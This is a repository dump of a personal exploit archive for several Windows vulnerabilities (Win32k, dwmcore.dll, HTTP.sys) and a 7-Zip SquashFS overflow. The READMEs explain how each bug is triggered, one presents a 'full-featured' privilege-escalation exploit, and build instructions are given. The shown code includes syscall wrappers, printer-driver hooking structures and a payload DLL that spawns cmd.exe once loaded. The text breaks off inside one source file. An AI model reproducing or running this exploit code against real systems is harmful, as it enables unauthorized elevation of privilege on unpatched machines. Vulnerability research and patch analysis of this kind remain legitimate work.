├── cve-2023-23410 ├── .gitignore ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.jpg ├── CMakeLists.txt ├── main.cpp └── README.md ├── cve-2023-29336 ├── .gitignore ├── CMakeLists.txt ├── .vscode │ ├── settings.json │ └── tasks.json ├── README.md ├── main.cpp └── visualisation │ └── src │ ├── prepare-heap-done.memorylayout.json │ └── menu-created.memorylayout.json ├── cve-2024-30051 ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── 7.png │ └── 2024-09-06-21-34-05.mp4 ├── CMakeLists.txt ├── ponylib │ ├── CMakeLists.txt │ ├── ponylib.h │ ├── ponylib.cpp │ ├── memory.h │ ├── win32u.h │ └── nt.h ├── src │ ├── CMakeLists.txt │ ├── payload.c │ ├── dcomp.h │ ├── dcomp.cpp │ └── exploit.cpp └── README.md ├── cve-2023-40481 ├── img │ ├── source.png │ └── hijacked.png ├── poc.squashfs └── README.md ├── cve-2023-21822 ├── img │ └── handyfunc.png ├── CMakeLists.txt ├── umpd.h ├── README.md ├── umpd.cpp ├── nt.h └── main.cpp └── README.md /cve-2023-23410/.gitignore: -------------------------------------------------------------------------------- 1 | build -------------------------------------------------------------------------------- /cve-2023-29336/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | _backup 3 | .vscode -------------------------------------------------------------------------------- /cve-2023-23410/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/1.png -------------------------------------------------------------------------------- /cve-2023-23410/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/2.png -------------------------------------------------------------------------------- /cve-2023-23410/img/3.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/3.png -------------------------------------------------------------------------------- /cve-2023-23410/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/4.png -------------------------------------------------------------------------------- /cve-2023-23410/img/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/5.jpg -------------------------------------------------------------------------------- /cve-2024-30051/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/1.png -------------------------------------------------------------------------------- /cve-2024-30051/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/2.png -------------------------------------------------------------------------------- /cve-2024-30051/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/3.png -------------------------------------------------------------------------------- /cve-2024-30051/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/4.png -------------------------------------------------------------------------------- /cve-2024-30051/img/5.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/5.png -------------------------------------------------------------------------------- /cve-2024-30051/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/6.png -------------------------------------------------------------------------------- /cve-2024-30051/img/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/7.png -------------------------------------------------------------------------------- /cve-2023-40481/img/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/img/source.png -------------------------------------------------------------------------------- /cve-2023-40481/poc.squashfs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/poc.squashfs -------------------------------------------------------------------------------- /cve-2023-40481/img/hijacked.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/img/hijacked.png -------------------------------------------------------------------------------- /cve-2023-21822/img/handyfunc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-21822/img/handyfunc.png -------------------------------------------------------------------------------- /cve-2024-30051/img/2024-09-06-21-34-05.mp4: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/2024-09-06-21-34-05.mp4 -------------------------------------------------------------------------------- /cve-2023-29336/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-29336") 4 | 5 | add_executable("${PROJECT_NAME}" "main.cpp") -------------------------------------------------------------------------------- /cve-2023-21822/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-21822") 4 | 5 | add_executable( 6 | "poc" "main.cpp" "umpd.cpp" 7 | ) -------------------------------------------------------------------------------- /cve-2024-30051/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("exploit.dwm.2024.30051") 4 | 5 | add_subdirectory("ponylib") 6 | add_subdirectory("src") -------------------------------------------------------------------------------- /cve-2023-23410/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-2341") 4 | 5 | # Main library definition 6 | add_executable("${PROJECT_NAME}" "main.cpp") -------------------------------------------------------------------------------- /cve-2023-29336/.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "*.rh": "cpp", 4 | "_backup": "c" 5 | }, 6 | "C_Cpp.default.configurationProvider": "ms-vscode.cmake-tools" 7 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/CMakeLists.txt: 
-------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("ponylib") 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | add_library( 9 | ${PROJECT_NAME} STATIC "ponylib.cpp" 10 | ) 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # PoC Archive 3 | 4 | Here I store my proofs of concept 5 | 6 | !!! ALL INFORMATION IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY !!! 7 | 8 | ## Patchdiff 9 | 10 | 11 | * [cve-2023-23410](cve-2023-23410/README.md) 12 | * [cve-2023-29336](cve-2023-29336/README.md) 13 | * [cve-2023-40481](cve-2023-40481/README.md) 14 | * [cve-2023-21822](cve-2023-21822/README.md) 15 | * [cve-2024-30051](cve-2024-30051/README.md) 16 | -------------------------------------------------------------------------------- /cve-2024-30051/src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc") 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | add_executable( 9 | ${PROJECT_NAME} "dcomp.cpp" "exploit.cpp" 10 | ) 11 | target_link_libraries(${PROJECT_NAME} PUBLIC "ponylib") 12 | target_include_directories(${PROJECT_NAME} PUBLIC "${CMAKE_SOURCE_DIR}") 13 | 14 | add_library("payload" SHARED payload.c ) -------------------------------------------------------------------------------- /cve-2023-40481/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-40481 7-Zip SquashFS Heap Buffer Overflow 2 | 3 | *poc.squashfs* is a synthesized SquashFS image which might lead to a heap buffer overflow inside 7-Zip. We can trigger an overflow in **CHandler::Open2** (SquashfsHandler.cpp), specifically inside the memcpy at line *1695*.
If the size of the metadata block associated with *id_table* is equal to the size of a squashfs_block (8192 bytes), the check that should prevent the overflow won't be performed. 4 | 5 | ![printscreen source code related to this bug](img/source.png) 6 | 7 | A full-featured exploit is possible but very unreliable due to heap mitigations and the structure of the source code. Only a few allocations are available before the vulnerability is triggered, which is not enough to set up heap determinism. 8 | 9 | ![hijacked vtable](img/hijacked.png) 10 | -------------------------------------------------------------------------------- /cve-2023-29336/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | "tasks": [ 3 | { 4 | "type": "cppbuild", 5 | "label": "C/C++: cl.exe build active file", 6 | "command": "cl.exe", 7 | "args": [ 8 | "/Zi", 9 | "/EHsc", 10 | "/nologo", 11 | "/Fe${fileDirname}\\${fileBasenameNoExtension}.exe", 12 | "${file}" 13 | ], 14 | "options": { 15 | "cwd": "${fileDirname}" 16 | }, 17 | "problemMatcher": [ 18 | "$msCompile" 19 | ], 20 | "group": { 21 | "kind": "build", 22 | "isDefault": true 23 | }, 24 | "detail": "Task generated by Debugger."
25 | } 26 | ], 27 | "version": "2.0.0" 28 | } -------------------------------------------------------------------------------- /cve-2024-30051/src/payload.c: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | 8 | #pragma comment(lib, "advapi32.lib") 9 | 10 | #include 11 | 12 | void payload() { 13 | 14 | CHAR message [] = "payload.dll sucessfully executed\nBye!"; 15 | 16 | HANDLE hFile = CreateFileA("C:\\dumps\\pwned.txt", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 17 | DWORD nbWritten = 0; 18 | 19 | WriteFile( 20 | hFile, 21 | message, 22 | (DWORD)strlen(message), 23 | &nbWritten, 24 | NULL 25 | ); 26 | CloseHandle(hFile); 27 | 28 | system("start /i C:\\Windows\\System32\\cmd.exe"); 29 | }; 30 | 31 | BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) { 32 | 33 | switch (dwReason) 34 | { 35 | case DLL_PROCESS_ATTACH: { 36 | payload(); 37 | break; 38 | } 39 | case DLL_THREAD_ATTACH: 40 | case DLL_THREAD_DETACH: 41 | case DLL_PROCESS_DETACH: 42 | break; 43 | } 44 | return TRUE; 45 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/ponylib.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB 2 | #define _PONYLIB 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | namespace ponylib { 10 | template 11 | class system_function_t { 12 | protected: 13 | std::string m_libraryName; 14 | std::string m_functionName; 15 | 16 | HMODULE m_hModule; 17 | FuncTy m_pProc; 18 | 19 | bool m_bInit = false; 20 | 21 | system_function_t() {}; 22 | system_function_t& operator = (system_function_t&) 23 | { 24 | return *this; 25 | }; 26 | public: 27 | system_function_t(std::string libraryName, std::string functionName): 28 | 
m_libraryName(libraryName), 29 | m_functionName(functionName), 30 | m_hModule(0), 31 | m_pProc(0) 32 | { 33 | m_hModule = LoadLibraryA(m_libraryName.c_str()); 34 | if (m_hModule == NULL) { 35 | return; 36 | } 37 | m_pProc = (FuncTy)GetProcAddress(m_hModule, m_functionName.c_str()); 38 | if (m_pProc == NULL) { 39 | return; 40 | } 41 | 42 | m_bInit = true; 43 | } 44 | ~system_function_t() { 45 | FreeLibrary((HMODULE)m_hModule); 46 | m_pProc = NULL; 47 | } 48 | bool init() const { 49 | return m_bInit; 50 | } 51 | FuncTy operator*() const { 52 | return m_pProc; 53 | } 54 | }; 55 | }; 56 | 57 | #endif // _PONYLIB -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/ponylib.cpp: -------------------------------------------------------------------------------- 1 | #include "ponylib.h" 2 | #include "win32u.h" 3 | #include "nt.h" 4 | #include "memory.h" 5 | 6 | 7 | namespace ponylib::nt { 8 | nt_map_view_of_section_t kNtMapViewOfSection = nt_map_view_of_section_t("ntdll", "NtMapViewOfSection"); 9 | nt_unmap_view_of_section_t kNtUnmapViewOfSection = nt_unmap_view_of_section_t("ntdll", "NtUnmapViewOfSection"); 10 | nt_query_system_information_t kNtQuerySystemInformation = nt_query_system_information_t("ntdll", "NtQuerySystemInformation"); 11 | } 12 | namespace ponylib::win32u { 13 | nt_d_composition_create_channel_t kNtDCompositionCreateChannel = nt_d_composition_create_channel_t("win32u", "NtDCompositionCreateChannel"); 14 | nt_d_composition_destroy_channel_t kNtDCompositionDestroyChannel = nt_d_composition_destroy_channel_t("win32u", "NtDCompositionDestroyChannel"); 15 | nt_d_composition_process_channel_batch_buffer_t kNtDCompositionProcessChannelBatchBuffer = nt_d_composition_process_channel_batch_buffer_t("win32u", "NtDCompositionProcessChannelBatchBuffer"); 16 | nt_d_composition_commit_channel_t kNtDCompositionCommitChannel = nt_d_composition_commit_channel_t("win32u", "NtDCompositionCommitChannel"); 17 | 
nt_d_composition_create_and_bind_shared_section_t kNtDCompositionCreateAndBindSharedSection = nt_d_composition_create_and_bind_shared_section_t("win32u", "NtDCompositionCreateAndBindSharedSection"); 18 | nt_user_create_dcomposition_hwnd_target_t kNtUserCreateDCompositionHwndTarget = nt_user_create_dcomposition_hwnd_target_t("win32u", "NtUserCreateDCompositionHwndTarget"); 19 | nt_user_destroy_dcomposition_hwnd_target kNtUserDestroyDCompositionHwndTarget = nt_user_destroy_dcomposition_hwnd_target("win32u", "NtUserDestroyDCompositionHwndTarget"); 20 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/memory.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB_MEMORY 2 | #define _PONYLIB_MEMORY 3 | 4 | #include 5 | 6 | #define _untyped_ptr_move_nbytes(ptr, off) (PVOID)( (PUINT8)( ptr ) + off ) 7 | 8 | namespace ponylib::memory { 9 | 10 | class memory_stream_t { 11 | protected: 12 | UINT32 m_pos; 13 | SIZE_T m_size; 14 | PVOID m_base; 15 | 16 | int m_errorCode = 0; 17 | public: 18 | memory_stream_t(): m_errorCode(STATUS_NO_MEMORY) {}; 19 | memory_stream_t(PVOID base, SIZE_T size, UINT32 startOffset = 0): m_base(base), m_size(size), m_pos(startOffset) {}; 20 | virtual ~memory_stream_t() = default; 21 | 22 | UINT32 pos() const { 23 | return m_pos; 24 | }; 25 | SIZE_T size() const { 26 | return m_size; 27 | }; 28 | PVOID base() const { 29 | return m_base; 30 | }; 31 | 32 | bool writeData(PVOID data, SIZE_T dataSize) { 33 | if (m_errorCode != 0) { 34 | return false; 35 | } 36 | 37 | if ( (m_pos + dataSize) > m_size || (m_pos + dataSize) < m_pos) { 38 | m_errorCode = STATUS_NO_MEMORY; 39 | return false; 40 | } 41 | 42 | memcpy( 43 | _untyped_ptr_move_nbytes(m_base, m_pos), 44 | data, 45 | dataSize 46 | ); 47 | 48 | m_pos += (UINT32)dataSize; 49 | m_errorCode = 0; 50 | 51 | return true; 52 | }; 53 | 54 | template 55 | bool write(Ty&& obj) { 56 | return writeData(&obj, 
sizeof(Ty)); 57 | }; 58 | 59 | void erase(UINT32 startOffset = 0) { 60 | memset(m_base, 0, m_pos); 61 | m_pos = startOffset; 62 | } 63 | }; 64 | 65 | } 66 | 67 | #endif // _PONYLIB_MEMORY -------------------------------------------------------------------------------- /cve-2024-30051/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-30051 dwmcore.dll Heap Buffer Overflow 2 | 3 | Tested on 10.0.19045 4 | 5 | The vulnerability is in the `CCommandBuffer::Initialize` function. We have an overflow because the memory size to be allocated is incorrectly calculated. The patch introduced a quick check for divisibility and in case the division operation ends with a remainder, the function terminates, btw memory is still allocated :) 6 | 7 | Attempting to trace from where the vulnerable function is reachable gave the following results. 8 | 9 | ![graph](img/1.png) 10 | 11 | From the call tree, we have three options: 12 | 13 | - `CSurfaceBrush::GetBrushParameters`. 14 | - `CPrimitiveGroup::GenerateDrawList`. 15 | - `CPrimitiveGroup::GetTextureMemoryLayoutData`. 16 | 17 | I chose `CSurfaceBrush` to create the trigger. 18 | 19 | I created a PoC that reaches the `CCommandBuffer::Initialize` code. In the creation I relied on the standard stacktrace, obtained by setting the breakpoint on the function `CSurfaceBrush::GetBrushParameters`. To create the PoC, I had to work with the `HelloComposition` example, from which it became clear how the resource tree should be constructed to reach the vulnerable code. 20 | 21 | Here is the resource tree that `HelloComposition` creates in order to draw a sprite of random size filled with a random color in a window: 22 | 23 | ![graph](img/2.png) 24 | 25 | Having analyzed the tree above and the example code, it is clear what conditions must be satisfied to reach the vulnerable code: 26 | 27 | - Since it is necessary to run the renderer, a window is needed. 
28 | - The area in which the rendering takes place must be visible. 29 | - Get a handle to [[Composition Window]] via `NtUserCreateDCompositionHwndTarget`. 30 | - Open the handle on the [[Composition Window]] as `CVisualTargetMarshaler`. 31 | 32 | Below you can see the resource tree satisfying the above conditions and leading to the vulnerability trigger. 33 | 34 | ![graph](img/3.png) 35 | 36 | In the images below you can see how the overflow occurs: 37 | 38 | 1. Memory allocation. RCX register contains 0x90, the size of the allocated memory. 39 | ![graph](img/4.png) 40 | 2. RAX contains a pointer to the allocated memory. 41 | ![graph](img/6.png) 42 | 3. State before memcpy. RCX contains the address of the destination buffer (allocated in past steps). RDX contains the address of the source buffer. R8 contains the size of the data to be copied. Here you can see that 0x90 < 0x95. 43 | ![graph](img/7.png) 44 | 45 | ## Build 46 | 47 | ```shell 48 | cd cve-2024-30051 49 | cmake -S . -B build 50 | cmake --build build --config Release 51 | ``` 52 | -------------------------------------------------------------------------------- /cve-2023-21822/umpd.h: -------------------------------------------------------------------------------- 1 | #ifndef _UMPD 2 | #define _UMPD 3 | 4 | #include 5 | #include 6 | 7 | #pragma pack(push, 1) 8 | typedef struct _My_My_UMTHDR { 9 | DWORD cjSize; 10 | DWORD ulType; 11 | DWORD ulReserved1; 12 | DWORD ulReserved2; 13 | } My_My_UMTHDR, *ptr_My_My_UMTHDR; 14 | typedef struct _My_UMPDTHDR { 15 | My_My_UMTHDR umthdr; 16 | ULONG64 humpd; 17 | } My_UMPDTHDR, *ptr_My_UMPDTHDR; 18 | typedef struct _My_DRVSTARTDOCINPUT { 19 | My_UMPDTHDR umpdthdr; 20 | PVOID pso; 21 | PWSTR pwszDocName; 22 | DWORD dwJobId; 23 | } My_DRVSTARTDOCINPUT, *ptr_My_DRVSTARTDOCINPUT; 24 | typedef struct _My_STORKEANDFILLINPUT { 25 | My_UMPDTHDR umpdthdr; 26 | PVOID pso; 27 | PVOID ppo; 28 | PVOID pco; 29 | PVOID pxo; 30 | PVOID pbo; 31 | PVOID pptlBrushOrg; 32 | PVOID 
plineattrs; 33 | PVOID gap_50_8h; 34 | ULONG32 gap_58_4h; 35 | ULONG32 gap_5C_4h; 36 | } My_STORKEANDFILLINPUT, *ptr_My_STORKEANDFILLINPUT; 37 | typedef struct _My_DRVENABLEPDEVINPUT { 38 | My_UMPDTHDR umpdthdr; 39 | PVOID umpdcookie; 40 | PVOID pdm; 41 | PVOID pLogAddress; 42 | ULONG32 cPatterns; 43 | ULONG32 gap_34_4h; 44 | PVOID phsurfPatterns; 45 | ULONG32 cjCaps; 46 | ULONG32 gap_44_Ch[3]; 47 | ULONG32 cjDevInfo; 48 | ULONG32 gap_54_Ch[3]; 49 | PVOID hdev; 50 | PVOID pDeviceName; 51 | PVOID hPrinter; 52 | ULONG32 bSandboxedCurrentProcess; 53 | ULONG32 clientPid; 54 | ULONG64 gap_80_8h; 55 | ULONG64 gap_88_8h; 56 | ULONG64 gap_90_8h; 57 | ULONG64 gap_98_8h; 58 | ULONG32 gap_A0_4h; 59 | ULONG32 gap_A4_4h; 60 | ULONG32 gap_A8_4h; 61 | ULONG32 gap_AC_4h; 62 | } My_DRVENABLEPDEVINPUT, *ptr_My_DRVENABLEPDEVINPUT; 63 | typedef struct _My_DRVENABLESURFACEINPUT { 64 | My_UMPDTHDR umpdthdr; 65 | ULONG64 hpdev; 66 | } My_DRVENABLESURFACEINPUT, *ptr_My_DRVENABLESURFACEINPUT; 67 | #pragma pack(pop) 68 | 69 | struct My_UMSO { 70 | ULONG magic; 71 | HBITMAP hsurf; 72 | SURFOBJ so; 73 | }; 74 | 75 | typedef INT (*FuncTy_GdiPrinterThunk_)( 76 | VOID* InputBuffer, 77 | ULONGLONG SomeBufferSizeLimit, 78 | VOID* OutputBuffer, 79 | ULONGLONG OutputBufferSize 80 | ); 81 | 82 | 83 | BOOL umpd_load_printer_dll(LPWSTR printerName, HANDLE& hPrinter, LPWSTR& pDriverPath, HMODULE& hPrinterDLL); 84 | BOOL umpd_set_gdi_hooks(); 85 | VOID umpd_set_cb(INT index, FuncTy_GdiPrinterThunk_ cb, BOOL bBefore = TRUE, BOOL bCallOrig = TRUE); 86 | 87 | INT umpd_gdi_think_hook(VOID *inputBuf, ULONGLONG inputBufSize, VOID *outputBuffer, ULONGLONG outputBufSize); 88 | 89 | // https://gist.github.com/TheWover/ae7f75b8a48d3b2d5b1fe60672918a27 90 | BOOL util_hook_iat(HMODULE dll, char const* targetDLL, void *targetFunction, void* detourFunction); 91 | 92 | #endif // _UMPD -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/win32u.h: 
-------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB_WIN32U 2 | #define _PONYLIB_WIN32U 3 | 4 | #include "ponylib.h" 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | namespace ponylib::win32u { 12 | /* 13 | Win32U API Proxies 14 | */ 15 | using nt_d_composition_create_channel_t = system_function_t< 16 | NTSTATUS (NTAPI*)( 17 | PHANDLE phChannel, 18 | PSIZE_T pSectionSize, 19 | PVOID* pMappedAddress 20 | ) 21 | >; 22 | using nt_d_composition_destroy_channel_t = system_function_t< 23 | NTSTATUS(NTAPI*)( 24 | HANDLE hChannel 25 | ) 26 | >; 27 | using nt_d_composition_process_channel_batch_buffer_t = system_function_t< 28 | NTSTATUS(NTAPI*)( 29 | HANDLE hChannel, 30 | DWORD dwArgStart, 31 | PDWORD pOutArg1, 32 | PDWORD pOutArg2 33 | ) 34 | >; 35 | using nt_d_composition_commit_channel_t = system_function_t< 36 | NTSTATUS(NTAPI*)( 37 | HANDLE hChannel, 38 | LPDWORD out1, 39 | LPBOOL out2, 40 | BOOL flag, 41 | HANDLE Object, 42 | PVOID a6, 43 | PVOID a7, 44 | DWORD a8 45 | ) 46 | >; 47 | using nt_d_composition_create_and_bind_shared_section_t = system_function_t< 48 | NTSTATUS(NTAPI*)( 49 | HANDLE hChannel, 50 | UINT32 hSharedSection, 51 | SIZE_T szSharedSection, 52 | PHANDLE phSection 53 | ) 54 | >; 55 | using nt_user_create_dcomposition_hwnd_target_t = system_function_t< 56 | NTSTATUS(NTAPI*)( 57 | HWND hwnd, 58 | BOOL topmost, 59 | PHANDLE phwnd 60 | ) 61 | >; 62 | using nt_user_destroy_dcomposition_hwnd_target = system_function_t< 63 | NTSTATUS(NTAPI*)( 64 | HWND hwnd, 65 | HANDLE hcomp 66 | ) 67 | >; 68 | 69 | /* 70 | Win32U API Proxies constants 71 | */ 72 | extern nt_d_composition_create_channel_t kNtDCompositionCreateChannel; 73 | extern nt_d_composition_destroy_channel_t kNtDCompositionDestroyChannel; 74 | extern nt_d_composition_process_channel_batch_buffer_t kNtDCompositionProcessChannelBatchBuffer; 75 | extern nt_d_composition_commit_channel_t kNtDCompositionCommitChannel; 76 | extern 
nt_d_composition_create_and_bind_shared_section_t kNtDCompositionCreateAndBindSharedSection; 77 | extern nt_user_create_dcomposition_hwnd_target_t kNtUserCreateDCompositionHwndTarget; 78 | extern nt_user_destroy_dcomposition_hwnd_target kNtUserDestroyDCompositionHwndTarget; 79 | }; 80 | 81 | #endif // _PONYLIB_WIN32U -------------------------------------------------------------------------------- /cve-2023-21822/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-21822 Win32k EoP 2 | 3 | This is a recreation of a great blog post on ZDI ([link](https://www.thezdi.com/blog/2023/8/1/exploiting-a-flaw-in-bitmap-handling-in-windows-user-mode-printer-drivers)). 4 | 5 | ## Exploitation notes 6 | 7 | It reuses code inside **win32kfull** to achieve read-write capabilities, in particular **vSrcCopyS16D16Identity**. This handy function has a single argument and can be semantically interpreted as memmove. In the test environment CFG was not enabled, which means I could have used **memmove** directly, but I wanted to deal with the restriction of staying within the win32kfull module. 8 | 9 | ![vSrcCopyS16D16Identity](img/handyfunc.png) 10 | 11 | ## Build 12 | 13 | ```shell 14 | cd cve-2023-21822 15 | cmake -S . -B build 16 | cmake --build build --config Release 17 | ``` 18 | 19 | ## Machine systeminfo 20 | 21 | ```shell 22 | Host Name: DESKTOP-19NG2CS 23 | OS Name: Microsoft Windows 10 Education 24 | OS Version: 10.0.19045 N/A Build 19045 25 | OS Manufacturer: Microsoft Corporation 26 | OS Configuration: Standalone Workstation 27 | OS Build Type: Multiprocessor Free 28 | Registered Owner: Windows User 29 | Registered Organization: 30 | Product ID: 00328-00000-00000-AA110 31 | Original Install Date: 27/03/2023, 14:36:49 32 | System Boot Time: 03/12/2023, 07:28:45 33 | System Manufacturer: VMware, Inc. 34 | System Model: VMware20,1 35 | System Type: x64-based PC 36 | Processor(s): 1 Processor(s) Installed.
37 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 38 | BIOS Version: VMware, Inc. VMW201.00V.21805430.B64.2305221830, 22/05/2023 39 | Windows Directory: C:\Windows 40 | System Directory: C:\Windows\system32 41 | Boot Device: \Device\HarddiskVolume1 42 | System Locale: en-gb;English (United Kingdom) 43 | Input Locale: en-gb;English (United Kingdom) 44 | Time Zone: (UTC+03:00) Kuwait, Riyadh 45 | Total Physical Memory: 2,047 MB 46 | Available Physical Memory: 737 MB 47 | Virtual Memory: Max Size: 3,199 MB 48 | Virtual Memory: Available: 1,927 MB 49 | Virtual Memory: In Use: 1,272 MB 50 | Page File Location(s): C:\pagefile.sys 51 | Domain: WORKGROUP 52 | Logon Server: \\DESKTOP-19NG2CS 53 | Hotfix(s): 6 Hotfix(s) Installed. 54 | [01]: KB5017022 55 | [02]: KB5015684 56 | [03]: KB5022282 57 | [04]: KB5014032 58 | [05]: KB5016705 59 | [06]: KB5020372 60 | Network Card(s): 1 NIC(s) Installed. 61 | [01]: Bluetooth Device (Personal Area Network) 62 | Connection Name: Bluetooth Network Connection 63 | Status: Media disconnected 64 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 65 | ``` 66 | -------------------------------------------------------------------------------- /cve-2023-29336/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-29336 Win32K EoP 2 | 3 | Full-featured exploit for elevation of privilege on Windows 1607. 4 | 5 | Writeup: 6 | 7 | * [RU](https://immortalp0ny.notion.site/In-details-writeup-of-CVE-2023-29336-9072a87f6ec8447e88a616636bc4f25d) 8 | * EN (In progress) 9 | 10 | ## Build 11 | 12 | ```shell 13 | cd cve-2023-29336 14 | cmake -S .
-B build 15 | cmake --build build --config Release 16 | ``` 17 | 18 | ## Machine systeminfo 19 | 20 | ```shell 21 | Host Name: DESKTOP-V4QR2KG 22 | OS Name: Microsoft Windows 10 Enterprise N 23 | OS Version: 10.0.14393 N/A Build 14393 24 | OS Manufacturer: Microsoft Corporation 25 | OS Configuration: Standalone Workstation 26 | OS Build Type: Multiprocessor Free 27 | Registered Owner: Windows User 28 | Registered Organization: 29 | Product ID: 00329-90000-00001-AA623 30 | Original Install Date: 5/22/2023, 7:58:42 AM 31 | System Boot Time: 7/27/2023, 1:26:09 PM 32 | System Manufacturer: VMware, Inc. 33 | System Model: VMware7,1 34 | System Type: x64-based PC 35 | Processor(s): 1 Processor(s) Installed. 36 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 37 | BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 8/10/2020 38 | Windows Directory: C:\Windows 39 | System Directory: C:\Windows\system32 40 | Boot Device: \Device\HarddiskVolume1 41 | System Locale: en-us;English (United States) 42 | Input Locale: en-us;English (United States) 43 | Time Zone: (UTC+03:00) Kuwait, Riyadh 44 | Total Physical Memory: 2,046 MB 45 | Available Physical Memory: 1,214 MB 46 | Virtual Memory: Max Size: 2,686 MB 47 | Virtual Memory: Available: 1,641 MB 48 | Virtual Memory: In Use: 1,045 MB 49 | Page File Location(s): C:\pagefile.sys 50 | Domain: WORKGROUP 51 | Logon Server: \\DESKTOP-V4QR2KG 52 | Hotfix(s): 4 Hotfix(s) Installed. 53 | [01]: KB3194623 54 | [02]: KB3199986 55 | [03]: KB3202790 56 | [04]: KB3200970 57 | Network Card(s): 3 NIC(s) Installed. 
58 | [01]: Microsoft Kernel Debug Network Adapter 59 | Connection Name: Local Area Connection* 1 60 | DHCP Enabled: Yes 61 | DHCP Server: 255.255.255.255 62 | IP address(es) 63 | [01]: 169.254.178.35 64 | [02]: fe80::2db4:7e18:640e:b223 65 | [02]: Bluetooth Device (Personal Area Network) 66 | Connection Name: Bluetooth Network Connection 67 | Status: Media disconnected 68 | [03]: Intel(R) 82574L Gigabit Network Connection 69 | Connection Name: Ethernet0 70 | Status: Hardware not present 71 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 72 | ``` 73 | -------------------------------------------------------------------------------- /cve-2023-23410/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | #ifndef WIN32_LEAN_AND_MEAN 5 | #define WIN32_LEAN_AND_MEAN 6 | #endif 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #pragma comment(lib, "httpapi.lib") 13 | 14 | int 15 | __cdecl 16 | wmain( 17 | int argc, 18 | __in_ecount(argc) wchar_t* argv[]) 19 | { 